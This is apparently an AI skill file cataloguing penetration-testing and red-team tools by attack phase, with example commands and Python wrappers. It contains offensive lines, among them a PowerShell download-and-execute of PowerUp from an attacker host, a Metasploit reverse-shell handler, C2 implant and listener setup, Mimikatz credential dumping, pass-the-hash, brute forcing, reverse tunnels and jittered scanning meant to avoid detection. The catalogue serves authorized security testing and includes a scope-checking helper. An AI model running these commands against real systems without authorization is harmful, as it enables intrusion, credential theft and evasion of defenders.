---
name: awesome-pentest-tools-catalog
description: Curated penetration testing and red team tools collection organized by penetration testing lifecycle and MITRE ATT&CK framework
triggers:
- what penetration testing tools are available for reconnaissance
- show me tools for privilege escalation on windows
- which tools can help with web vulnerability scanning
- find tools for domain enumeration and lateral movement
- what are the best C2 frameworks for red teaming
- help me find tools for fingerprinting web applications
- recommend tools for tunneling and proxy during pentest
- show me free alternatives to commercial security scanners
---
# Awesome Pentest Tools Catalog
> Skill by [ara.so](https://ara.so) — Security Skills collection.
This skill provides expert knowledge of the **Awesome Pentest Tools** catalog, a comprehensive collection of penetration testing and red team tools organized by the penetration testing lifecycle and MITRE ATT&CK framework. Use this to discover, recommend, and implement security testing tools across all phases of penetration testing.
## Overview
The catalog organizes tools into these primary phases:
1. **Information Gathering** (信息收集) - Asset and target reconnaissance
2. **Vulnerability Analysis** (漏洞分析) - Host and web vulnerability scanning
3. **Exploitation** (漏洞利用) - Exploit frameworks and service-specific tools
4. **Privilege Escalation** (权限提升) - Linux, Windows, and container escape
5. **Persistence** (权限维持与后门) - C2 frameworks, webshells, and evasion
6. **Tunneling & Proxying** (隧道代理) - Network pivoting and protocol tunneling
7. **Post-Exploitation** (后渗透与域) - Credential theft and lateral movement
8. **Covering Tracks** (痕迹清理) - Log cleanup and anti-forensics
## Key Tool Categories
### Information Gathering
#### Network & Port Scanning
```bash
# Masscan - Fast internet-wide TCP scanner
masscan -p1-65535 192.168.1.0/24 --rate=10000 -oL output.txt
# RustScan - Modern port scanner
rustscan -a 192.168.1.1 --ulimit 5000 -- -A -sC
# Naabu - Fast port discovery
naabu -host 192.168.1.1 -p - -rate 10000
# Nmap - Network mapper
nmap -sV -sC -p- 192.168.1.1 -oA scan_results
# Netspy - Internal network segment discovery
netspy -t 192.168.1.1
```
#### Fingerprinting & Technology Detection
```bash
# WhatWeb - Next generation web scanner
whatweb -v -a 3 https://target.com
# Webanalyze - Batch Wappalyzer detection
webanalyze -host https://target.com -apps apps.json
# EHole - Red team system fingerprint detection
./EHole finger -l urls.txt -json result.json
# TideFinger - Comprehensive fingerprint recognition
./TideFinger_Go -u https://target.com
```
#### Directory & Parameter Discovery
```bash
# FFuF - Fast web fuzzer
ffuf -w wordlist.txt -u https://target.com/FUZZ -mc 200,301,302
# Dirsearch - Web path scanner
dirsearch -u https://target.com -e php,html,js -x 403,404
# Feroxbuster - Fast content discovery
feroxbuster -u https://target.com -w wordlist.txt -x php,asp,aspx,jsp
```
### Vulnerability Scanning
#### Quick Network Scanning
```bash
# Fscan - Comprehensive internal network scanner
./fscan -h 192.168.1.0/24 -np -no -nobr
# Vscan - Vulnerability scanner with POC integration
./vscan -target 192.168.1.1 -all
```
#### Comprehensive Vulnerability Assessment
```bash
# Nuclei - Fast template-based scanner
nuclei -l targets.txt -t nuclei-templates/ -severity critical,high
# Xray - Passive & active security scanner
xray webscan --basic-crawler http://target.com --html-output report.html
# OpenVAS - Full-featured vulnerability scanner
# (GUI-based, typically accessed via web interface)
```
#### Code Auditing
```python
# Semgrep - Static analysis for many languages
# Install: pip install semgrep
import subprocess

def scan_code(path, rules="auto"):
    """Run a semgrep security scan and return its JSON report as a string"""
    cmd = ["semgrep", "--config", rules, path, "--json"]
    result = subprocess.run(cmd, capture_output=True, text=True)
    return result.stdout

# Usage
scan_results = scan_code("./src", "p/security-audit")
```
```bash
# Fortify - Java code auditor
java -jar fortify.jar -source ./src -output report.html
# Seay - PHP code auditor (GUI-based)
# Typically run through graphical interface
```
### Exploitation
#### Framework Tools
```python
# SearchSploit - Exploit-DB search
import subprocess

def search_exploits(keyword):
    """Search Exploit-DB with searchsploit and return its JSON output"""
    result = subprocess.run(
        ["searchsploit", keyword, "-j"],
        capture_output=True,
        text=True
    )
    return result.stdout

# Usage
exploits = search_exploits("apache 2.4")
```
```bash
# Metasploit Framework
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 10.0.0.1; set LPORT 4444; exploit"
# Pocsuite3 - POC framework
pocsuite -r poc_file.py -u http://target.com --verify
```
#### Service-Specific Tools
```bash
# Hydra - Network login cracker
hydra -L users.txt -P passwords.txt ssh://192.168.1.1
# SQLMap - SQL injection tool
sqlmap -u "http://target.com/page?id=1" --dbs --batch
# Redis exploitation
redis-cli -h 192.168.1.1 -a $REDIS_PASSWORD
```
### Privilege Escalation
#### Linux Privilege Escalation
```bash
# LinPEAS - Linux privilege escalation scanner
./linpeas.sh -a > linpeas_report.txt
# Linux Exploit Suggester
./linux-exploit-suggester.sh --uname $(uname -r)
# PEASS-ng (includes linpeas, winpeas)
./linpeas.sh -q -o linpeas_out.txt
```
#### Windows Privilege Escalation
```powershell
# WinPEAS - Windows privilege escalation scanner
.\winPEASx64.exe > winpeas_output.txt
# Windows Exploit Suggester - NG
python wes.py systeminfo.txt -i 'Elevation of Privilege' --hide 'Internet Explorer'
# PowerUp - PowerShell privilege escalation
powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.1/PowerUp.ps1'); Invoke-AllChecks"
```
### Post-Exploitation & C2
#### Command & Control Frameworks
```python
# Sliver - Modern C2 framework
# Generate implant
# sliver > generate --http 10.0.0.1 --save /tmp/payload.exe
# Cobalt Strike (commercial) - Beacon configuration
# Typically configured via GUI teamserver
# Empire/Starkiller - PowerShell C2
# Configure via web interface or API
import os
import requests

def empire_create_listener(api_url, token):
    """Create an Empire HTTP listener through the REST API"""
    headers = {"Authorization": f"Bearer {token}"}
    listener_config = {
        "name": "http_listener",
        "template": "http",
        "options": {
            "Host": "http://10.0.0.1:8080",
            "Port": "8080"
        }
    }
    response = requests.post(
        f"{api_url}/listeners",
        json=listener_config,
        headers=headers
    )
    response.raise_for_status()
    return response.json()

# Usage with environment variables (never hardcode the token)
empire_url = os.getenv("EMPIRE_API_URL", "http://localhost:1337/api/v2")
empire_token = os.getenv("EMPIRE_API_TOKEN")
if empire_token:
    listener = empire_create_listener(empire_url, empire_token)
```
#### WebShell Management
```php
// Behinder (冰蝎) - Encrypted webshell
// Client connects to server-side shell with password
// Godzilla (哥斯拉) - Advanced webshell manager
// Supports multiple payload types: JSP, PHP, ASP, ASPX
// AntSword (蚁剑) - Cross-platform webshell manager
// Configuration example (do not hardcode credentials)
```
```python
# Interactive shell upgrade
"""
Common pattern for upgrading to interactive TTY shell
"""
import subprocess
upgrade_commands = """
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# Press Ctrl+Z
stty raw -echo; fg
stty rows 38 columns 116
"""
```
### Tunneling & Proxying
#### Modern Tunneling Tools
```bash
# Chisel - Fast TCP/UDP tunnel over HTTP
# Server
./chisel server -p 8080 --reverse
# Client
./chisel client http://10.0.0.1:8080 R:socks
# NPS - Powerful penetration testing proxy
# Server
./nps install
./nps start
# Client
./npc -server=10.0.0.1:8024 -vkey=$NPS_VKEY -type=tcp
```
```ini
# Frp - Fast reverse proxy configuration example
# frps.ini (server)
[common]
bind_port = 7000
token = ${FRP_TOKEN}
```
```ini
# frpc.ini (client)
[common]
server_addr = 10.0.0.1
server_port = 7000
token = ${FRP_TOKEN}
[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000
```
#### Protocol-Specific Tunnels
```bash
# Regeorg - SOCKS over HTTP
python reGeorgSocksProxy.py -p 1080 -u http://target.com/tunnel.jsp
# Neo-reGeorg - Improved version
python neoreg.py generate -k $TUNNEL_PASSWORD
python neoreg.py -k $TUNNEL_PASSWORD -u http://target.com/tunnel.php
# DNS Tunneling with dnscat2
# Server
dnscat2-server tunnel.example.com
# Client
./dnscat tunnel.example.com
```
### Domain & Lateral Movement
```bash
# BloodHound - Active Directory visualization
# Start Neo4j database
neo4j console
# Collect data with SharpHound (run on the Windows host, not in bash)
# .\SharpHound.exe -c All --outputdirectory C:\Temp
# Impacket - Python classes for network protocols
# Pass-the-Hash with wmiexec
impacket-wmiexec -hashes :$NTLM_HASH administrator@192.168.1.10
# Mimikatz - Credential extraction (entered in the mimikatz console on Windows)
# privilege::debug
# sekurlsa::logonpasswords
# LaZagne - Credential recovery tool (Windows)
# laZagne.exe all -oN output.txt
```
```python
# CrackMapExec - Network authentication testing
import os
import subprocess

def cme_smb_scan(target_range, username, password_file):
    """Execute a CrackMapExec SMB scan and return its output"""
    cmd = [
        "crackmapexec", "smb", target_range,
        "-u", username,
        "-p", password_file,
        "--shares"
    ]
    result = subprocess.run(cmd, capture_output=True, text=True)
    return result.stdout

# Usage
results = cme_smb_scan(
    "192.168.1.0/24",
    "administrator",
    os.getenv("PASSWORD_LIST", "passwords.txt")
)
```
## Common Workflows
### External Pentest Workflow
```python
"""
Typical external penetration test workflow
"""
import os
import subprocess

class ExternalPentest:
    def __init__(self, target_domain):
        self.target = target_domain
        self.results_dir = f"results_{target_domain}"
        os.makedirs(self.results_dir, exist_ok=True)

    def asset_discovery(self):
        """Phase 1: Asset discovery"""
        # Subdomain enumeration
        subprocess.run([
            "subfinder", "-d", self.target,
            "-o", f"{self.results_dir}/subdomains.txt"
        ], check=True)
        # HTTP probing
        subprocess.run([
            "httpx", "-l", f"{self.results_dir}/subdomains.txt",
            "-o", f"{self.results_dir}/live_hosts.txt"
        ], check=True)

    def port_scanning(self):
        """Phase 2: Port scanning"""
        subprocess.run([
            "naabu", "-l", f"{self.results_dir}/live_hosts.txt",
            "-p", "-", "-rate", "10000",
            "-o", f"{self.results_dir}/ports.txt"
        ], check=True)

    def vulnerability_scan(self):
        """Phase 3: Vulnerability scanning"""
        subprocess.run([
            "nuclei", "-l", f"{self.results_dir}/live_hosts.txt",
            "-t", "nuclei-templates/",
            "-severity", "critical,high",
            "-o", f"{self.results_dir}/vulnerabilities.txt"
        ], check=True)

    def run_full_scan(self):
        """Execute the complete external pentest"""
        self.asset_discovery()
        self.port_scanning()
        self.vulnerability_scan()
        return f"Results saved in {self.results_dir}/"

# Usage
pentest = ExternalPentest("target.com")
pentest.run_full_scan()
```
### Internal Network Pentest
```bash
#!/bin/bash
# Internal network penetration testing workflow
TARGET_NETWORK="192.168.1.0/24"
RESULTS_DIR="internal_pentest_$(date +%Y%m%d)"
mkdir -p "$RESULTS_DIR"
# Phase 1: Network discovery
echo "[*] Phase 1: Network Discovery"
nmap -sn "$TARGET_NETWORK" -oA "$RESULTS_DIR/network_sweep"
# Extract live hosts from the grepable output: nmap -iL and fscan -hf expect
# one host per line, not the raw .gnmap file
grep "Status: Up" "$RESULTS_DIR/network_sweep.gnmap" | awk '{print $2}' > "$RESULTS_DIR/live_hosts.txt"
# Phase 2: Port scanning
echo "[*] Phase 2: Port Scanning"
nmap -p- -T4 -iL "$RESULTS_DIR/live_hosts.txt" -oA "$RESULTS_DIR/full_scan"
# Phase 3: Service detection
echo "[*] Phase 3: Service Detection"
nmap -sV -sC -iL "$RESULTS_DIR/live_hosts.txt" -oA "$RESULTS_DIR/service_scan"
# Phase 4: Vulnerability scanning
echo "[*] Phase 4: Vulnerability Scanning"
fscan -hf "$RESULTS_DIR/live_hosts.txt" -o "$RESULTS_DIR/fscan_results.txt"
# Phase 5: Exploit vulnerable services
echo "[*] Phase 5: Exploitation (manual review required)"
echo "Review results in $RESULTS_DIR/"
```
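Each later phase of the workflow above consumes the hosts found by the sweep, so the hand-off depends on reading nmap's grepable (`.gnmap`) output correctly. The following parser is an added example, not code from the catalogue; the scan output it reads is constructed, and it returns both the live-host list that `-iL` and `-hf` expect and the open ports per host from a later `-p-` scan.

```python
import ipaddress
import re
from typing import Dict, List

# Constructed sample of nmap grepable output (-oA writes it as *.gnmap);
# the first lines mimic a -sn sweep, the Ports line a later -p- scan.
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated as: nmap -sn 192.168.1.0/24 -oA network_sweep
Host: 192.168.1.10 (fileserver.lab)\tStatus: Up
Host: 192.168.1.11 ()\tStatus: Down
Host: 192.168.1.20 ()\tStatus: Up
Host: 192.168.1.20 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 445/closed/tcp//microsoft-ds///\tIgnored State: closed (997)
# Nmap done -- 256 IP addresses (2 hosts up) scanned in 5.00 seconds
"""

# "Host: <ip> (<hostname>)<tab>Field: value<tab>Field: value..."
_HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\s*(.*)$")

def parse_gnmap(text: str) -> Dict[str, Dict[str, object]]:
    """Return {ip: {"hostname": str, "up": bool, "open_ports": [int]}}"""
    hosts: Dict[str, Dict[str, object]] = {}
    for line in text.splitlines():
        m = _HOST_RE.match(line)
        if not m:
            continue  # comment lines start with '#'
        ip, hostname, rest = m.groups()
        entry = hosts.setdefault(ip, {"hostname": "", "up": False, "open_ports": []})
        if hostname and not entry["hostname"]:
            entry["hostname"] = hostname
        for field in rest.split("\t"):
            key, _, value = field.partition(": ")
            if key == "Status":
                entry["up"] = entry["up"] or value.strip() == "Up"
            elif key == "Ports":
                entry["up"] = True  # a port table implies the host answered
                for port in value.split(","):
                    num, state = port.strip().split("/")[:2]
                    if state == "open":
                        entry["open_ports"].append(int(num))
    return hosts

def live_hosts(text: str) -> List[str]:
    """Host list suitable for 'nmap -iL' or 'fscan -hf' (one IP per line)"""
    up = [ip for ip, e in parse_gnmap(text).items() if e["up"]]
    return sorted(up, key=ipaddress.ip_address)
```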
## Configuration Examples
### Nuclei Templates Configuration
```yaml
# nuclei-config.yaml
# Place in ~/.config/nuclei/config.yaml
templates:
- /path/to/nuclei-templates
- /path/to/custom-templates
severity:
- critical
- high
threads: 50
rate-limit: 150
timeout: 5
http:
max-redirects: 3
user-agent: "Custom-Scanner/1.0"
network:
max-host-error: 30
output:
no-timestamp: false
json: true
```
### Proxychains Configuration
```ini
# /etc/proxychains.conf or ~/.proxychains/proxychains.conf
strict_chain
# or dynamic_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# Add your SOCKS proxy
socks5 127.0.0.1 1080
# Or HTTP proxy
http 127.0.0.1 8080
```
## Best Practices
### Tool Selection Guide
```python
"""
Helper functions for tool selection based on scenario
"""
def select_port_scanner(scenario):
    """Choose an appropriate port scanner"""
    scanners = {
        "internet_wide": "masscan",      # Fastest for large ranges
        "single_host_full": "rustscan",  # Fast + comprehensive
        "service_detection": "nmap",     # Best fingerprinting
        "internal_network": "naabu",     # Balanced speed/accuracy
    }
    return scanners.get(scenario, "nmap")

def select_web_scanner(target_type):
    """Choose a web vulnerability scanner"""
    scanners = {
        "quick_check": "nuclei",     # Template-based, fast
        "comprehensive": "xray",     # Deep crawl + detection
        "api_testing": "ffuf",       # API endpoint fuzzing
        "sql_injection": "sqlmap",   # SQL-specific
    }
    return scanners.get(target_type, "nuclei")

def select_c2_framework(requirements):
    """Choose a C2 framework based on requirements"""
    frameworks = {
        "stealth": "sliver",             # Modern, encrypted
        "feature_rich": "cobaltstrike",  # Commercial, full-featured
        "powershell": "empire",          # PowerShell-focused
        "open_source": "covenant",       # .NET-based alternative
    }
    return frameworks.get(requirements, "sliver")
```
### Safety & Legality
```python
"""
Pre-engagement checklist automation
"""
import ipaddress
from datetime import datetime

class PentestEngagement:
    def __init__(self):
        self.scope = []          # IPs, CIDR ranges, or hostnames
        self.out_of_scope = []
        self.authorization = None
        self.start_date = None
        self.end_date = None

    @staticmethod
    def _matches(target, entry):
        """True if target equals entry or is an IP inside a CIDR entry"""
        if target == entry:
            return True
        try:
            return ipaddress.ip_address(target) in ipaddress.ip_network(entry, strict=False)
        except ValueError:
            return False  # hostname entries only match exactly

    def verify_authorization(self, target):
        """Verify target is in authorized scope and the testing window is open"""
        if any(self._matches(target, e) for e in self.out_of_scope):
            raise ValueError(f"Target {target} is OUT OF SCOPE")
        if not any(self._matches(target, e) for e in self.scope):
            raise ValueError(f"Target {target} not in authorized scope")
        if self.start_date is None or self.end_date is None:
            raise ValueError("Authorized testing window not set")
        current_date = datetime.now()
        if not (self.start_date <= current_date <= self.end_date):
            raise ValueError("Outside authorized testing window")
        return True

    def log_action(self, action, target):
        """Log all testing actions"""
        log_entry = f"[{datetime.now()}] {action} on {target}\n"
        with open("pentest_log.txt", "a") as f:
            f.write(log_entry)

# Usage
engagement = PentestEngagement()
engagement.scope = ["192.168.1.0/24", "target.com"]
engagement.out_of_scope = ["192.168.1.1"]  # Critical infrastructure
engagement.start_date = datetime(2024, 1, 1)
engagement.end_date = datetime(2024, 1, 31)
try:
    engagement.verify_authorization("192.168.1.50")
    engagement.log_action("nmap scan", "192.168.1.50")
except ValueError as e:
    print(f"Authorization check failed: {e}")
```
## Troubleshooting
### Tool Installation Issues
```bash
# Go-based tools (nuclei, naabu, httpx, etc.)
export GO111MODULE=on
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
# Python tools with dependency issues
python3 -m venv pentest_env
source pentest_env/bin/activate
pip install --upgrade pip setuptools wheel
pip install impacket sqlmap
# Binary tools permission issues
chmod +x ./tool_name
# If capabilities needed (e.g., raw sockets)
sudo setcap cap_net_raw+ep ./tool_name
```
### Network/Proxy Issues
```bash
# Test proxy connectivity
curl --proxy socks5://127.0.0.1:1080 http://example.com
# Force tool through proxy
proxychains4 nmap -sT 192.168.1.1
# DNS issues in proxied environment
echo "nameserver 8.8.8.8" | sudo tee /etc/resolv.conf
```
### Rate Limiting & Detection
```python
"""
Implement rate limiting and jitter to avoid detection
"""
import random
import time

class StealthScanner:
    def __init__(self, delay_range=(1, 5)):
        self.delay_range = delay_range

    def random_delay(self):
        """Add a random delay between requests"""
        delay = random.uniform(*self.delay_range)
        time.sleep(delay)

    def scan_targets(self, targets, scan_function):
        """Scan with rate limiting"""
        results = []
        for target in targets:
            self.random_delay()
            result = scan_function(target)
            results.append(result)
        return results

# Usage
scanner = StealthScanner(delay_range=(2, 8))
# scanner.scan_targets(target_list, scan_function)
```
## Additional Resources
- **Official Documentation**: Review individual tool repositories for detailed docs
- **Community**: Many tools have Discord/Slack channels for support
- **Updates**: Follow tool maintainers on GitHub for latest releases
- **Legal Framework**: Always obtain written authorization before testing
## Environment Variables Reference
```bash
# Common environment variables for security tools
export NUCLEI_TEMPLATES_PATH="/opt/nuclei-templates"
export METASPLOIT_DB_HOST="localhost"
export EMPIRE_API_TOKEN="your-api-token-here"
export FRP_TOKEN="your-frp-token-here"
export NPS_VKEY="your-nps-vkey-here"
export TUNNEL_PASSWORD="your-tunnel-password-here"
export PASSWORD_LIST="/path/to/passwords.txt"
```
Creator's repository · aradotso/security-skills